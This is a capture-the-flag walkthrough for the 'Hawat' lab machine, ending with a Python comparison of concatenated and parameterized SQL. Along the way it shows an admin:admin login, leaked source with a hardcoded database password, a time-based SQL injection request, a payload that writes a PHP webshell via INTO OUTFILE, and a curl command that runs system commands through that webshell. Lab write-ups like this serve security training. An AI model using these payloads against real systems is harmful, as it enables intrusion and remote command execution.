
PG: Hawat | Walkthrough

November 14, 2021

Enumeration

Nmap

$ nmap $ip -p22,111,139,443,445,17445,30455,50080 -sV -oN nmapInitial.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-14 18:54 +0545
Stats: 0:00:18 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 25.00% done; ETC: 18:55 (0:00:18 remaining)
Stats: 0:00:23 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 25.00% done; ETC: 18:55 (0:00:36 remaining)
Nmap scan report for 192.168.206.147
Host is up (0.35s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4 (protocol 2.0)
111/tcp closed rpcbind
139/tcp closed netbios-ssn
443/tcp closed https
445/tcp closed microsoft-ds
17445/tcp open unknown
30455/tcp open http nginx 1.18.0
50080/tcp open http Apache httpd 2.4.46 ((Unix) PHP/7.4.15)

Fuzz directories on port 50080

$ gobuster dir -u http://$ip:50080/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt -t 100 -x php,html,txt --no-error -q
/images (Status: 301) [Size: 244] [--> http://192.168.206.147:50080/images/]
/index.html (Status: 200) [Size: 9088]
/4 (Status: 301) [Size: 239] [--> http://192.168.206.147:50080/4/]
/cloud (Status: 301) [Size: 243] [--> http://192.168.206.147:50080/cloud/]
  • log in to Nextcloud with admin:admin
  • download issuetracker.zip
  • less IssueController.java
@GetMapping("/issue/checkByPriority")
public String checkByPriority(@RequestParam("priority") String priority, Model model) {
    //
    // Custom code, need to integrate to the JPA
    //
    Properties connectionProps = new Properties();
    connectionProps.put("user", "issue_user");
    connectionProps.put("password", "ManagementInsideOld797");
    try {
        conn = DriverManager.getConnection("jdbc:mysql://localhost:3306/issue_tracker", connectionProps);
        // The request parameter is concatenated straight into the SQL text,
        // so quotes and SQL keywords supplied by the client become part of the query.
        String query = "SELECT message FROM issue WHERE priority='" + priority + "'";
        System.out.println(query);
        Statement stmt = conn.createStatement();
        // The result set is discarded; the query is executed purely for its side effects.
        stmt.executeQuery(query);
    } catch (SQLException e1) {
        // TODO Auto-generated catch block
        e1.printStackTrace();
    }
    // TODO: Return the list of the issues with the correct priority
    List<Issue> issues = service.GetAll();
    model.addAttribute("issuesList", issues);
    return "issue_index";
}
  • get the web root of the PHP server from phpinfo.php on port 30455
$_SERVER['DOCUMENT_ROOT'] /srv/http

Exploitation

Test for SQLi

POST /issue/checkByPriority?priority=Normal'+UNION+SELECT+sleep(5);+--+- HTTP/1.1
Host: 192.168.120.130:17445
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=E408CE3E9BBBEC15DCAD194F380E68A9
Upgrade-Insecure-Requests: 1

Upload a simple webshell

priority=Normal' UNION SELECT (<?php echo exec($_GET["cmd"]);) INTO OUTFILE '/srv/http/cmd.php'; --

Command execution in

curl "http://192.168.120.130:30455/cmd.php?cmd=id"
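As an added illustration that is not part of the box or this walkthrough, the controller's string-concatenated query from IssueController.java is reproduced next to its parameterized counterpart using Python's sqlite3 against a constructed issue table, so the difference between the two can be run offline. The table rows and the injected row text are made up.

```python
import sqlite3
from typing import List

# Constructed sample rows standing in for the issue_tracker table the
# controller queries (message, priority); the contents are made up.
SAMPLE_ISSUES = [
    ("Login page returns 500", "Normal"),
    ("Typo on the about page", "Low"),
    ("Password reset leaks tokens", "Critical"),
]

# Same shape as the priority value sent in the walkthrough's SQLi test,
# with the sleep() swapped for a literal row so the effect is visible.
INJECTED_PRIORITY = "Normal' UNION SELECT 'attacker controlled row' -- -"


def seed_db() -> sqlite3.Connection:
    """Create an in-memory table shaped like issue(message, priority)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE issue (message TEXT, priority TEXT)")
    conn.executemany("INSERT INTO issue VALUES (?, ?)", SAMPLE_ISSUES)
    return conn


def check_by_priority_concat(conn: sqlite3.Connection, priority: str) -> List[str]:
    """Mirrors the controller: the parameter is pasted into the SQL text, so a
    quote, UNION and comment marker inside it are parsed as SQL syntax."""
    query = "SELECT message FROM issue WHERE priority='" + priority + "'"
    return [row[0] for row in conn.execute(query)]


def check_by_priority_param(conn: sqlite3.Connection, priority: str) -> List[str]:
    """Hardened form: a bound parameter is always a string value and never
    SQL syntax, whatever characters it contains."""
    query = "SELECT message FROM issue WHERE priority=?"
    return [row[0] for row in conn.execute(query, (priority,))]


if __name__ == "__main__":
    db = seed_db()
    print("concatenated: ", check_by_priority_concat(db, INJECTED_PRIORITY))
    print("parameterized:", check_by_priority_param(db, INJECTED_PRIORITY))
```

With the injected value the concatenated query returns the real "Normal" issue plus the attacker's row, while the parameterized query returns nothing because no row has that literal priority.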